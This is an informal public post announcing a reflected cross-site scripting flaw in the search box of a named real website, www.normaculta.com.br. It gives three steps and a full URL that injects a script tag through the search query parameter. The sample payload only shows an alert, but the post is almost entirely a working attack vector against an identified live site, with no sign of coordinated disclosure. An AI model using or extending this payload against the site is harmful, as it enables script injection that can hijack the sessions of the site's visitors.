what's up security guys, romuloxxi in the your hood!
website: www.normaculta.com.br
vulnerability: reflected xss
proof of concept
1 . go to website.
2 . put your javascript code in 'Buscar...'.
3 . press enter and ready, your code has been run.
example: https://www.normaculta.com.br/busca/?q=%22%3E%3Cscript%3Ealert(%27reflected%20xss%20by%20romuloxxi%27)%3B%3C%2Fscript%3E
the end!